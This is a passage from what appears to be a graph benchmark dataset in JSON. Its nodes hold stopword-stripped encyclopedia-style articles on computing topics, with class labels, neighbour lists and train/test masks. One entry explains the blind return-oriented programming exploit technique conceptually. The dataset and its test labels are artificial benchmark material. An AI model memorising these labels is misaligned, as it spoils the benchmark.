in-house dropped rest changed claris name filemaker inc. concentrate product version 4.0 introduced 1997 added plug-in architecture much like adobe photoshop enabled third-party developers add features filemaker bundled plug-in web companion allowed database act web server plug-ins added features interface enabled filemaker serve ftp client perform external file operations send messages remote filemaker files internet intranet version 7 released 2004 introduced new file format file extension .fp7 supporting file sizes 8 terabytes increase 2 gigabytes allowed previous versions individual fields could hold 4 gigabytes binary data container fields 2 gigabytes 2-byte unicode text per record 64 kilobytes previous versions filemaker relational model enriched offering multiple tables per file graphical relationship editor displayed allowed manipulation related tables manner resembled entity-relationship diagram format accompanying foundational changes filemaker inc. also introduced developer certification program 2005 filemaker inc. announced filemaker 8 product family offered developer expanded feature set included tabbed interface script variables tooltips enhanced debugging custom menus ability copy paste entire tables field definitions scripts script steps within files version 8.5 released 2006 added integrated web viewer ability view things shipment tracking information fedex wikipedia entries named layout objects filemaker 9 released july 10 2007 introduced quick-start screen conditional formatting fluid layout auto-resizing hyperlinked pointers databases external sql links filemaker 10 released january 5 2009 year macworld conference expo offered scripts triggered user actions redesigned user interface similar mac os x leopard 10.5 applications filemaker 11 released march 9 2010 introduced charting streamlined filemaker 12 released april 4 2012 version also added themes database templates so-called starter solutions simplified creation ios databases filemaker go 11 july 20 2010 filemaker go 12 iphone ipad april 4 2012 allow creation modification deletion records handheld devices design schema changes must made within full filemaker pro application filemaker go 12 offers multitasking improved media integration export data multiple formats enhanced container fields filemaker 13 released launches ios 7 os x mavericks 10.9 first shipped december 2013 client server products enhanced support many mobile web methods data access filemaker go 13 parallel ipad–iphone product become single client devices server admin tool runs html5 longer requiring java app filemaker 14 platform released may 15 2015 included filemaker pro 14 filemaker pro 14 advanced filemaker server 14 filemaker go 14 followed version 15 may 2016 version 16 may 2017 including equivalent pro pro advanced server go versions late 2016 filemaker began annually publicizing software roadmap future features working well identifying features moving away may deprecate near future filemaker inc. always hard time describing filemaker software database includes user interface security rapid application development tools etc filemaker inc. initiated new marketing program annual developers conference august 2018 address poor description categories workplace innovation platform filemaker files compatible mac windows file type extensions self-running applications runtime kiosk mode platform-specific filemaker available worldwide english simplified chinese dutch french german italian japanese korean brazilian portuguese spanish swedish also specific versions filemaker users central european indian middle eastern languages versions offer spellchecking data entry sorting printing options languages respective region also contain localized templates localized instant web publishing central european version filemaker includes english russian polish czech turkish interfaces customized templates russian polish czech turkish addition russian greek estonian lithuanian latvian serbian bulgarian hungarian supported varying degrees version intended southeast asian languages english user interface supports indic-language data entry sorting indexing hindi marathi bengali panjabi gujarati tamil telugu kannada malayalam similarly middle eastern version english french user interfaces option change text direction right-to-left support arabic hebrew data entry filemaker pro filemaker pro advanced include scripting capabilities variety built-in functions automation common tasks complex calculations numerous steps available navigation conditional execution script steps editing records utilities filemaker pro advanced provides script debugger allows developer set break points monitor data values step script lines filemaker 13 introduced useful script deeply queries container field document metadata filemaker dynamic markup language fdml markup language used earlier versions filemaker introduced 1998 fdml also often referred claris dynamic markup language cdml named former company claris fdml extension html used special tags codice_1 display filemaker data web pages filemaker officially dropped support fdml 2004 filemaker since version 9 includes ability connect number sql databases without resorting using sql including mysql sql server oracle requires installation sql database odbc driver many cases third-party license per client driver connect sql database sql databases used data sources filemaker relationship graph thus allowing developer create new layouts based sql database create edit delete sql records via filemaker layouts functions reference sql fields filemaker calculations script steps cross-platform relational database application versions filemaker pro 5.5 onwards also odbc interface filemaker 12 introduced new function executesql allows user perform sql query filemaker database retrieve data allow data modification deletion schema changes one major flaw odbc support lack one-to-one field-type mapping filemaker external industry-standard databases issues caused fact filemaker strict data types filemaker field marked numeric return mapping odbc driver however filemaker allows non-numeric characters stored numeric field type unless field specifically marked strictly numeric filemaker 16 empowers integrations via curl json rest-based filemaker data api support tableau web data connector offered visualize filemaker data rest-based api license free trial expired september 27 2018 filemaker 17 offers permanent rest-based data api standard licensing include 2gb outbound data per user per month container data count towards limit inbound data api data transfer unlimited",
    "neighbors": [
      10755,
      9732,
      4111,
      7697,
      11289,
      6186,
      6700,
      5677,
      10286,
      1074,
      8754,
      9780,
      9784,
      8253,
      576,
      5696,
      9286,
      8783,
      4180,
      10838,
      1623,
      3167,
      3681,
      9826,
      10340,
      5733,
      8806,
      3691,
      2676,
      119,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      6797,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      171,
      10413,
      2735,
      3248,
      4283,
      7869,
      7364,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      7928,
      8441,
      2819,
      1290,
      9999,
      784,
      11030,
      4888,
      10023,
      4910,
      4399,
      7983,
      823,
      2363,
      4411,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2388,
      6495,
      9063,
      10602,
      3948,
      11629,
      7022,
      10608,
      6023,
      6539,
      1428,
      3483,
      2979,
      9123,
      11171,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      9166,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      4598,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 1550,
    "label": 5,
    "text": "Time-hopping:time-hopping time-hopping th communications signal technique used achieve anti-jamming aj low probability intercept lpi also refer pulse-position modulation simplest form employs 2 discrete pulses referring unique positions pulse within transmission window transmit k bit per pulse achieve lpi transmission time changed randomly varying period duty cycle pulse carrier using pseudo-random sequence transmitted signal intermittent start stop times although often used form hybrid spread-spectrum ss systems th strictly speaking non-ss technique spreading spectrum caused factors associated th using pulses low duty cycle wide frequency response example hybrid ss th-fhss hybrid tdma time division multiple access",
    "neighbors": [
      3847,
      9863,
      2057,
      10381,
      2968,
      2458,
      5020,
      5664,
      11686,
      7723,
      11181,
      1969,
      2994,
      5304,
      7490,
      3140,
      7108,
      11591,
      5321,
      7498,
      3040,
      1121,
      3168,
      8160,
      2920,
      7400,
      2802
    ],
    "mask": "None"
  },
  {
    "node_id": 1551,
    "label": 7,
    "text": "GDocsDrive:gdocsdrive gdocsdrive client app google docs enables users manage files stored google docs desktop main benefit gdocsdrive allows users modify cloud files using local applications enables use desktop software microsoft office adobe suite others manage online files gdocsdrive uses google ’ cloud storage store files online storage default 15 gb storage available free charge however users extend storage google annual fee gdocsdrive paid software price 29.99 usd offering 14-day free trial currently windows version available gdocsdrive listed google apps marketplace also available techcrunch crunchbase gdocsdrive software written c++ libraries like curl openssl used http communications coded based google document list api 3.0 process modifying google cloud files using local applications involves 3 steps 1. selected file modified downloaded local system temp folder 2 file opened modified proper local application 3 file uploaded back google docs new revision added original online file gdocsdrive employs oauth 2.0 authentication method users log therefore users present credentials gdocsdrive log google ’ account sign webpage gdocsdrive uses two tokens – access token refresh token- received google operations gmail users google apps users supported 2-step verification login also supported gdocsdrive designed google docs desktop client sync tool like dropbox sugarsync although drive name gdocsdrive drive letter mapping feature",
    "neighbors": [
      3366,
      6797,
      4623,
      7983,
      10673,
      3442,
      6750,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 1552,
    "label": 9,
    "text": "Compiler-compiler:compiler-compiler computer science compiler-compiler compiler generator programming tool creates parser interpreter compiler form formal description programming language machine common type compiler-compiler precisely called parser generator handles syntactic analysis input grammar typically written bnf ebnf defines syntax programming language output source code parser programming language parser generators handle semantics programming language generation machine code target machine metacompiler software development tool used chiefly construction compilers translators interpreters programming languages input metacompiler computer program written specialized programming metalanguage designed chiefly purpose constructing compilers language compiler produced called object language minimal input producing compiler metaprogram specifying object language grammar semantic transformations object program typical parser generator associates executable code rules grammar executed rules applied parser pieces code sometimes referred semantic action routines since define semantics syntactic structure analyzed parser depending upon type parser generated routines may construct parse tree abstract syntax tree generate executable code directly one earliest 1964 surprisingly powerful versions compiler-compilers meta ii accepted analytical grammar output facilities produce stack machine code able compile languages experimental compiler-compilers take input formal description programming language semantics typically using denotational semantics approach often called 'semantics-based compiling pioneered peter mosses semantic implementation system sis 1978 however generated compiler code produced inefficient time space production compilers currently built way research continues production quality compiler-compiler project carnegie-mellon university formalize semantics semi-formal framework machine description compiler-compilers exist many flavors including bottom-up rewrite machine generators see jburg used tile syntax trees according rewrite grammar code generation attribute grammar parser generators e.g antlr used simultaneous type checking constant propagation parsing stage metacompilers reduce task writing compilers automating aspects regardless object language makes possible design domain-specific languages appropriate specification particular problem metacompiler reduces cost producing translators domain-specific object languages point becomes economically feasible include solution problem domain-specific language design metacompiler metalanguage powerful string symbol processing languages also useful generating wide range software engineering analysis tools besides useful domain-specific language development metacompiler prime example domain-specific language designed domain compiler writing metacompiler metaprogram usually written metalanguage existing computer programming language process metacompiler written metalanguage compiling equivalent self-hosting compiler common compilers written today self-hosting compilers self-hosting powerful tool many metacompilers allowing easy extension metaprogramming metalanguage feature separates metacompiler apart compiler compilers takes input specialized metaprogramming language describes aspects compilers operation metaprogram produced metacompiler complete program program written c++ basic general programming language metaprogramming metalanguage powerful attribute allowing ease development computer programming languages computer tools command line processors text string transforming analysis easily coded using metaprogramming metalanguages metacompilers full featured development package includes linker run-time support library usually machine oriented language required writing support library c c++ could used machine oriented language library consisting support functions required compilation process usually rounds full metacompiler package computer science prefix meta commonly used mean category metadata data data describing data language used describe languages metalanguage meta may also mean higher level abstraction metalanguage operates higher level abstraction order describe properties language backus–naur form bnf formal metalanguage originally used define algol 60 bnf weak metalanguage describes syntax says nothing semantics meaning metaprogramming writing computer programs ability treat programs data metacompiler takes input metaprogram written specialized metalanguages higher level abstraction specifically designed purpose metaprogramming output executable object program analogy drawn c++ compiler takes input c++ programming language program metacompiler takes input metaprogramming metalanguage program many forth advocates call process creating new implementation forth meta-compilation constitutes metacompiler forth definition metacompiler forth use metacompiler disputed mainstream computer science see forth programming language history compiler construction actual forth process compiling combination forth self-hosting extensible programming language sometimes cross compilation long established terminology computer science metacompilers general compiler writing system besides forth metacompiler concept indistinguishable self-hosting extensible language actual process acts lower level defining minimum subset forth words used define additional forth words full forth implementation defined base set sounds like bootstrap process problem almost every general purpose language compiler also fits forth metacompiler description replace x common language c c++ pascal cobol fortran ada modula-2 etc x would meta compiler according forth usage metacompiler metacompiler operates abstraction level compiler compiles operates self-hosting compiler level compiling one see problem definition metacompiler applied language however examining concept programming forth adding new words dictionary extending language way metaprogramming metaprogramming forth makes metacompiler programming forth adding new words language changing language way metaprogramming forth metacompiler forth language specifically designed metaprogramming programming forth extending forth adding words forth vocabulary creates new forth dialect forth specialized metacompiler forth language dialects first compiler-compiler use name written tony brooker 1960 used create compilers atlas computer university manchester including atlas autocode compiler early history metacompilers closely tied history sig/plan working group 1 syntax driven compilers group started primarily effort howard metcalfe los angeles area fall 1962 howard metcalfe designed two compiler-writing interpreters one used bottom-to-top analysis technique based method described ledley wilson used top-to-bottom approach based work glennie generate random english sentences context-free grammar time val schorre described two meta machines one generative one analytic generative machine implemented produced random algebraic expressions meta first metacompiler implemented schorre ibm 1401 ucla january 1963 original interpreters metamachines written directly pseudo-machine language meta ii however written higher-level metalanguage able describe compilation pseudo-machine language lee schmidt bolt beranek newman wrote metacompiler march 1963 utilized crt display time-sharing pdp-l compiler produced actual machine code rather interpretive code partially bootstrapped meta i. schorre bootstrapped meta ii meta spring 1963 paper refined metacompiler system presented 1964 philadelphia acm conference first paper metacompiler available general reference syntax implementation technique schorre system laid foundation systems followed system implemented small 1401 used implement small algol-like language many similar systems immediately followed roger rutman a. c. sparkplug developed implemented logik language logical design simulation ibm 7090 january 1964 compiler used algorithm produced efficient code boolean expressions another paper 1964 acm proceedings describes meta iii developed schneider johnson ucla ibm 7090 meta iii represents attempt produce efficient machine code large class languages meta iii implemented completely assembly language two compilers written meta iii codol compiler-writing demonstration compiler puregol dialect algol 60 pure gall call algol late 1964 lee schmidt bootstrapped metacompiler eqgen pdp-l beckman 420 eqgen logic equation generating language 1964 system development corporation began major effort development metacompilers effort includes powerful metacompilers bookl book2 written lisp extensive tree-searching backup capability outgrowth one q-32 systems sdc meta 5 meta 5 system incorporates backup input stream enough facilities parse context-sensitive language system successfully released wide number users many string-manipulation applications compiling many elaborate push-down stacks attribute setting testing facilities output mechanisms fact meta 5 successfully translates jovial programs pl/l programs clearly demonstrates power flexibility lot system developed 1966 stanford research institute modeled closely meta ii new special-purpose constructs allowing generate compiler would turn able compile subset pl/l system extensive statistic-gathering facilities used study characteristics top-down analysis simple specialized translator system designed aid writing pre-processors pl/i simple written pl/i composed three components executive syntax analyzer semantic constructor tree meta compiler developed stanford research institute menlo park california april 1968 early metacompiler history well documented tree meta manual tree meta paralleled sdc developments unlike earlier metacompilers separated semantics processing syntax processing syntax rules contained tree building operations combined recognized language elements tree nodes tree structure representation input processed simple form unparse rules unparse rules used node recognition attribute testing matched resulted associated action performed addition like tree element could also tested unparse rule unparse rules also recursive language able call unparse rules passing elements thee tree action unparse rule performed concept metarnachine originally put forth glennie simple three hardware versions designed one actually implemented latter washington university st. louis machine built macro-modular components instructions codes described schorre cwic compiler writing implementing compilers last known schorre metacompiler developed systems development corporation erwin book dewey val schorre steven j. sherman full power lisp 2 list processing language optimizing algorithms could operate syntax generated lists trees code generation cwic also symbol table built language resurgence domain-specific languages need parser generators easy use easy understand easy maintain metacompilers becoming valuable tool advanced software engineering projects examples parser generators yacc vein antlr coco/r cup gnu bison eli fsl sablecc sid syntax improving device javacc useful pure parser generators address parsing part problem building compiler tools broader scope pqcc coco/r dms software reengineering toolkit provide considerable support difficult post-parsing activities semantic analysis code optimization generation earliest schorre metacompilers meta meta ii developed d. val schorre ucla schorre based metacompilers followed adding improvements language analysis and/or code generation programming common use programming language name refer compiler programming language context distinguishing meaning c++ program compiled using c++ compiler also applies following example meta ii compiler language metalanguages schorre line metacompilers functional programming languages use top grammar analyzing syntax equations embedded output transformation constructs syntax equation compiled test function returning success failure name function name body form logical expression consisting tests may grouped alternates output productions test like bool languages success true failure false defining programming language analytically top natural example program could defined defining program sequence zero declaration schorre meta x languages driving rule program rule example driving rule program rule test function calls declaration test rule returns success failure loop operator repeatedly calling declaration failure returned operator always successful even zero declaration program would always return success cwic long fail bypass declaration long-fail part backtracking system cwic character sets early compilers limited character used alternant operator b written b. parentheses used grouping describes construct followed b c. boolean expression would sequence x implied x meaning grouping operator order evaluation always left right input character sequence specified ordering tests special operator words whose first character used clarity .empty used last alternate previous alternant need present indicates x optionally followed b specific characteristic metalanguages programming languages backtracking avoided compiler constructor systems may declared three possible sequences left parser figure characteristics metaprogramming metalanguages common schorre metacompilers derived meta hand compiled metacompiler used compile meta ii little else known meta except initial compilation meta ii produced nearly identical code hand coded meta compiler rule consists optionally tests operators output productions rule matches part input program source character stream returning success failure success input advanced matched characters failure input advanced output productions produced form assembly code directly syntax rule tree-meta introduced tree building operators node_name number moving output production transforms unparse rules tree building operators used grammar rules directly transforming input abstract syntax tree unparse rules also test functions matched tree patterns unparse rules called grammar rule abstract syntax tree transformed output code building abstract syntax tree unparse rules allowed local optimizations performed analyzing parse tree moving output productions unparse rules made clear separation grammar analysis code production made programming easier read understand 1968-1970 erwin book dewey val schorre steven j. sherman developed cwic compiler writing implementing compilers system development corporation charles babbage institute center history information technology box 12 folder 21 cwic compiler development system composed three special-purpose domain specific languages intended permit description certain aspects translation straight forward manner syntax language used describe recognition source text construction intermediate tree structure generator language used describe transformation tree appropriate object language syntax language follows dewey val schorre previous line metacompilers resembles treemeta tree building operators syntax language unparse rules treemeta extended work object based generator language based lisp 2 cwic includes three languages generators language semantics similar lisp parse tree thought recursive list general form generator language function code process given tree included features general purpose programming language plus form stuff would emit stuff onto output file generator call may used unparse_rule generator passed element unparse_rule pattern placed return values listed example parse tree looks like add something1 something2 expr_gen x would called something1 return x variable unparse rule local variable used production_code_generator expr_gen called something2 returns generator call unparse rule passed element position occupies hopefully x registers return last transforms intended load atomic register return register first production would used generate 360 ar add register instruction appropriate values general registers example part generator every generator expression evaluates value con processed last transform could well written case load returns first parameter register returned getreg functions load getreg cwic generators authors cwic metacompiler assists task compiler-building automating non creative aspects aspects regardless language produced compiler translate makes possible design languages appropriate specification particular problem reduces cost producing processors languages point becomes economically feasible begin solution problem language design",
    "neighbors": [
      4998,
      2831,
      9871,
      1685,
      5399,
      1952,
      1956,
      7462,
      6840,
      2751,
      3904,
      10560,
      8262,
      9926,
      1610,
      1360,
      7634,
      2647,
      6753,
      6242,
      7777,
      6502,
      2537,
      10474,
      9714,
      4980
    ],
    "mask": "None"
  },
  {
    "node_id": 1553,
    "label": 2,
    "text": "Fedora_Legacy:fedora legacy fedora legacy community-supported open-source software project freely distribute patches critical software bugs vulnerabilities users older versions red hat linux fedora core linux distributions publisher red hat ceased support jesse keating david eisenstein two fedora legacy software maintainers announced discontinuation project 31 december 2006 fedora legacy later cited following reasons discontinuing project enough people contributing testing deploying patches enough funds waning interest project new discussion extending software release life cycle fedora core discontinuation fedora legacy providing updates red hat linux versions 7.3 9 fedora core 3 4 ceased support fedora core 1 2 red hat published fedora core 6 test 2 earlier 2006 fedora legacy announced intention provide updates red hat 7.3 9 end year focus fedora core 3 4",
    "neighbors": [
      4961,
      3969,
      5636,
      5988,
      5096,
      9353,
      9455,
      10961,
      8539,
      2974,
      11643,
      4729,
      5723,
      10172,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 1554,
    "label": 4,
    "text": "Blind_return_oriented_programming:blind return oriented programming blind return oriented programming brop exploit technique successfully create exploit even attacker possess target binary brop attacks shown bittau et al defeated address space layout randomization aslr stack canaries 64-bit systems current improvements os security hardware security features like linux pax project code injection impossible security researchers conceived new attack named return oriented programming defeat nx non-executable memory attack relies affecting program flow controlling stack especially return addresses gadgets fundamental units attack gadgets group instruction sequences ending return along certain state stack gadget perform operation like loading word memory register performing complex operation like conditional jump large enough target binary turing complete collection gadgets constructed enough get shellcode executed one assumption rop makes attacker possesses target binaries hence knows addresses gadgets beforehand three new scenarios brop relevant case closed binary services discover vulnerabilities techniques like fuzz penetration testing need used ii known vulnerability open-source library leveraged carry exploit even though proprietary binary uses closed source iii also used hack open-source server binary unknown.the attack assumes service server known stack vulnerability also service restart crash return instruction pointers usually protected stack canaries stack canary causes program crash value modified buffer overrun brop model attack buffer overrun carried byte byte try overrun results either program crash continued execution program crash implies stack value incorrectly guessed therefore 256 tries average case 128 tries stack value probably estimated 64 bit machines 4 stack reads would required leak canary canary leaked return instruction pointer perturbed way may however noted though estimation stack canary exact said return instruction address attacker would satisfied able leak address within text segment address space stage heart attack objective phase initiate write system call sending dump binary attacker write system call three params socket buffer length x86-64 calling conventions require parameters passed registers appropriate pop instructions rsi rdi rdx would needed set arguments write system call instruction sequences like pop rdi ret like would helpful regard simple rop version write system call would 1 pop rdi ret socket 2 pop rsi ret buffer 3 pop rdx ret length 4 pop rax ret write syscall number 5 syscall one problem methodology even useful gadgets found address space return address stack would lead non-executable stack high probability remedy brop proposers conceived stop gadgets stop gadget anything would cause program block like infinite loop blocking system call like sleep also workers processors affected attack stuck infinite loop hence allowing attacker carry attack mentioned bare-bones methodology attack reality optimizations carried help efficiently carrying attack primary among use procedure linker tables plts track writing system call instead passing system call number syscall function others include using strcmp populate rdx register pop rdx ret instruction sequences extremely rare writing found plt attacker dump contents target binary find gadgets attacker use conventional rop gadget search techniques gather enough create shellcode shellcode exploited system taken full control root access huge assumption brop attack server restarts crash restarting re-randomize address space enabling re-randomization address space startup provide almost complete protection brop another technique used netbsd linux sleep crash slows attack considerably allows system administrator look suspicious activity apart conventional protection rop style control flow hijacking attacks control flow integrity also provide provable prevention significant performance overhead another attack similar nature brop jit just-in-time -rop jit-rop also another attack based information disclosure able also defeat address space layout randomization brop jit-rop attempt locate gadgets binary order initiate rop attack goal exploit type data leak however unlike brop jit-rop attack interactive seeks adapt no-crash/crash situations rather attacker send script discover gadgets subsequently creates attack delivery also jit-rop must two different vulnerabilities heap stack known advance attack brop requires awareness stack vulnerability",
    "neighbors": [
      4562,
      1103
    ],
    "mask": "None"
  },
  {
    "node_id": 1555,
    "label": 2,
    "text": "Software_Distributor:software distributor software distributor sd hewlett-packard company name hp-ux software package management system sd provides set tools creating packages install software system running hp-ux operating system packages grouped together software repository called depot server configured host multiple depots installation software packages even entire systems sd first available release 10.0 hp-ux 1995 since undergone several enhancements bug fixes provides reliable software installation tool uses client-server arrangement distribute software using background daemon called swagentd agent started boot time communicates using either tcp udp protocols rpc sd packages normally stored transmitted compressed form using either gzip compress programs tools performing sd operations normally accessed command line sd includes following commands commands include broad range command-line options allow relatively fine control task performed addition command-line programs several tools also launch gui versions x window system display gui version swinstall performs filtering software list match software packages system run commands log messages administrative area useful diagnosing installation issues tracking software loaded removed software packages built means specification file set install scripts actual software content install scripts executed software installation verification removal used prepare system software perform activation deactivation package specification file determines software package organized list locations various files loaded package restrict systems package installed determine security configuration package also provides various information package name version description software packages organized hierarchy containers highest level bundle product lowest filesets files hierarchy arranged follows actually product fileset levels needed many packages subproduct level sometimes used group together filesets bundle provides higher-level grouping related products one filesets product one products bundle fileset level used specifically loading files product installed without associated filesets c. filesets products linked together various requirement tags cause swinstall select appropriate dependencies automatically fileset multiple control scripts specific files load scripts executed following order installation corresponding set scripts executed reverse order swremove scripts include verify performing sanity check swverify command unpreinstall unpostinstall none scripts included package depending requirements installation useful performing cleanup previous packages creating links adding software directory various search environment variables forth",
    "neighbors": [
      9441,
      7847,
      5384,
      5067,
      11184,
      4309,
      1813,
      1304,
      3163
    ],
    "mask": "Test"
  },
  {
    "node_id": 1556,
    "label": 8,
    "text": "FastCGI:fastcgi fastcgi binary protocol interfacing interactive programs web server variation earlier common gateway interface cgi fastcgi main aim reduce overhead related interfacing web server cgi programs allowing server handle web page requests per unit time common gateway interface cgi protocol interfacing external applications web servers cgi applications run separate processes created start request torn end one new process per request model makes cgi programs simple implement limits efficiency scalability high loads operating system overhead process creation destruction becomes significant also cgi process model limits resource reuse methods reusing database connections in-memory caching etc address scalability shortcomings cgi open market developed fastcgi first introduced webserver product mid-1990s open market originally developed fastcgi part competitive response netscape proprietary in-process application programming interfaces apis netscape server application programming interface nsapi developing web applications developed first open market fastcgi implemented several webserver makers however approach competed methods speed simplify server-subprogram communication apache http server modules mod_perl mod_php appeared around time gained popularity quickly various methods including cgi remain common use instead creating new process request fastcgi uses persistent processes handle series requests processes owned fastcgi server web server service incoming request web server sends environment variable information page request fastcgi process either unix domain socket named pipe transmission control protocol tcp connection responses returned process web server connection web server delivers response end user connection may closed end response web server fastcgi service processes persist individual fastcgi process handle many requests lifetime thereby avoiding overhead per-request process creation termination processing multiple requests concurrently done several ways using one connection internal multiplexing i.e. multiple requests one connection using multiple connections mix methods multiple fastcgi servers configured increasing stability scalability web site administrators programmers find separating web applications web server fastcgi many advantages embedded interpreters mod_perl mod_php etc. separation allows server application processes restarted independently – important consideration busy web sites also enables implementation per-application hosting service security policies important requirement isps web hosting companies different types incoming requests distributed specific fastcgi servers equipped handle types requests efficiently fastcgi implemented language supports network sockets since fastcgi protocol implementation tightly bound one language application programming interfaces apis exist recent frameworks ruby rails catalyst django kepler plack allow use either embedded interpreters mod_ruby mod_perl mod_python mod_lua example fastcgi",
    "neighbors": [
      4485,
      7430,
      8582,
      8965,
      1802,
      10506,
      9229,
      2062,
      1937,
      11154,
      1556,
      1435,
      10012,
      9245,
      8350,
      5663,
      10284,
      8994,
      11682,
      2596,
      3237,
      3876,
      7847,
      9125,
      4777,
      10020,
      9387,
      428,
      5165,
      5677,
      7212,
      7983,
      10026,
      2994,
      4658,
      692,
      2485,
      10924,
      11688,
      7608,
      2105,
      6714,
      1468,
      4797,
      10622,
      8644,
      4423,
      10186,
      11466,
      3920,
      7889,
      3545,
      5593,
      5849,
      6366,
      225,
      865,
      7784,
      8554,
      9834,
      9580,
      4589,
      8689,
      9841,
      11386,
      124,
      2045,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 1557,
    "label": 4,
    "text": "Security_question:security question security question form shared secret used authenticator commonly used banks cable companies wireless providers extra security layer financial institutions used questions authenticate customers since least early 20th century 1906 speech meeting section american bankers association baltimore banker william m. hayden described institution use security questions supplement customer signature records described signature cards used opening new accounts spaces customer birthplace residence mother maiden name occupation age hayden noted items often left blank residence information used primarily contact customer mother maiden name useful strong test identity although observed rare someone outside customer family try withdraw money customer account said mother maiden name useful verification rarely known outside family even people opening accounts often unprepared question similarly modern practice credit card provider could request customer mother maiden name issuing replacement lost card 2000s security questions came widespread use internet form self-service password reset security questions reduced information technology help desk costs allowing use security questions online rendered vulnerable keystroke logging attacks addition whereas human customer service representative may able cope inexact security answers appropriately computers less adept users must remember exact spelling sometimes even case answers provide poses threat answers written exposing physical theft due commonplace nature social-media many older traditional security questions longer useful secure important remember security question another password therefore security question shared anyone else include information readily available social media websites remaining simple memorable difficult guess constant time understanding every question work everyone rsa u.s. network security provider division emc corporation gives banks 150 questions choose many questioned usefulness security questions security specialist bruce schneier points since public facts person easier guess hackers passwords users know create fake answers questions forget answers thus defeating purpose creating inconvenience worth investment",
    "neighbors": [
      6562,
      1315,
      9576,
      8978,
      2483,
      5108,
      5433,
      7994,
      11198
    ],
    "mask": "Test"
  },
  {
    "node_id": 1558,
    "label": 7,
    "text": "EigenTrust:eigentrust eigentrust algorithm reputation management algorithm peer-to-peer networks developed sep kamvar mario schlosser hector garcia-molina algorithm provides peer network unique global trust value based peer history uploads thus aims reduce number inauthentic files p2p network cited approximately 3853 articles according google scholar peer-to-peer systems available today like gnutella open often anonymous lack accountability hence user malicious intent introduce peer-to-peer network resources may inauthentic corrupted malicious virus reflects poorly credibility current peer-to-peer systems research team stanford provides reputation management system peer system unique global trust value based peer history uploads peer requesting resources able access trust value peer avoid downloading files untrusted peers eigentrust algorithm based notion transitive trust peer trusts peer j would also trust peers trusted j peer calculates local trust value peers provided authentic fake downloads based satisfactory unsatisfactory transactions sat j refers number satisfactory responses peer received peer j unsat j refers number unsatisfactory responses peer received peer j local value normalized prevent malicious peers assigning arbitrarily high local trust values colluding malicious peers arbitrarily low local trust values good peers normalized local trust value c local trust values aggregated central location distributed manner create trust vector whole network based idea transitive trust peer would ask peers knows report trust value peer k weigh responses peers trust peer places assume user knew c values whole network form matrix c trust vector formula_4 defines trust value formula_5 given equation shown c assumed aperiodic strongly connected powers matrix c converge stable value point seems large value x trust vector formula_8 converge vector every peer network vector formula_8 known left principal eigenvector matrix c also note since formula_8 nodes network represents global trust value based results simple centralized trust value computing algorithm written note assume local trust values whole network available present matrix c also note equation shown converges replace initial vector formula_11 vector formula_12 m-vector representing uniform probability distribution peers basic eigentrust algorithm shown",
    "neighbors": [
      8640,
      4229
    ],
    "mask": "Test"
  },
  {
    "node_id": 1559,
    "label": 7,
    "text": "Quorum_(software):quorum software quorum also known quorum analytics american multinational software technology company headquartered washington dc quorum produces online legislative data analysis aggregation platform provides quantitative insights qualitative policy questions quorum developed stakeholder engagement legislative tracking grassroots advocacy company operates internationally office brussels belgium serves cities counties capitols across 50 us states quorum compiles aggregates publicly available big data—in form bills amendments committee documents floor statements voting records social media posts press releases email newsletters census data—into single comprehensive database platform uses quantitative analytics identify key players specified legislation quorum used identify speaking specific issue measure effectiveness lawmakers identify connection representatives identify champions specific legislation review congressional records gauge congressional response specific issues quorum founded alex wirth jonathan marks 2014 undergraduates harvard university idea quorum born frustrating summer alex wirth spent capitol hill attempting build bipartisan support presidential youth council wirth saw first hand challenging advocates organizations influence legislative process wirth worked college roommate jonathan marks discover could use computer science make process influencing legislation easier effective initial goal see could “ use computers figure members congress know work together based previous patterns. ” beta version quorum platform built summer 2014 association harvard innovation lab financed grant harvard institute politics quorum earned funding 2014 i3 harvard college innovation challenge mckinley family grant social enterprise 2014 harvard ventures pitch competition 2015 george washington university business plan competition 2015 queen entrepreneurs competition quorum publicly launched january 26 2015 boston massachusetts may 2015 company moved headquarters washington dc closer client base quorum named number one dc startup-to-watch 2017 technical.ly may 2017 quorum opened office brussels belgium serve consultancy market europe regulatory capital quorum provides software service saas clients pay annual subscription provide public affairs government affairs team access quorum software data",
    "neighbors": [
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 1560,
    "label": 4,
    "text": "NetVault_Backup:netvault backup netvault set data protection software developed supported quest software netvault backup backup recovery software product used protect data software applications physical virtual environments one central management interface supports many servers application platforms protocols unix linux microsoft windows vmware microsoft hyper-v oracle sybase microsoft sql server ndmp oracle acsls ibm das/aci microsoft exchange server db2 teradata quest software offers data deduplication protection nas filers ndmp netvault backup based client-server architecture central netvault backup server provides job management media management device management client management reporting notifications logging functions netvault backup server maintains history backups netvault backup database enabling users identify object want restore netvault clients “ agents ” work netvault backup server back recover respective servers applications data client software installed machine protected netvault webui enables centralized administration netvault backup server browser netvault supports tape drives tape libraries backup devices attached central server protected machine located anywhere network enabling lan-free backups additionally devices controlled ndmp attached supported filer netvault backup server master backup server deployed microsoft windows linux netvault backup protect windows server linux solaris freebsd aix hp-ux hyper-v vmware also back variety applications nas devices ndmp using so-called plug-ins list includes microsoft sql server oracle microsoft exchange server lotus notes db2 sybase others three options within netvault suite enabling backup recovery disk tape bare metal recovery bmr data deduplication quest supports netapp products following technologies originally netvault backup intended back physical tapes tape drives however product soon extended support backup disk data deduplication netvault backup supports quest dr appliance netvault smartdisk dell dr appliance hardware-based inline deduplication storage product deduplication engine originally developed ocarina networks netvault ocarina engineering teams worked integrate two technologies netvault backup also used netvault smartdisk disk storage repository deduplication product netvault smartdisk perform post-process data deduplication represents contiguous storage pool disk without subdivided virtual tapes slots easier management allows byte-level variable block-based software deduplication netvault backup supports emc data domain via dd boost quantum dxi lan-free backups netvault backup write physical tape drive vtl shared multiple machines using fibre channel iscsi",
    "neighbors": [
      9655,
      2818,
      1400,
      3366,
      6153,
      1037,
      1358,
      3951,
      6797,
      7983,
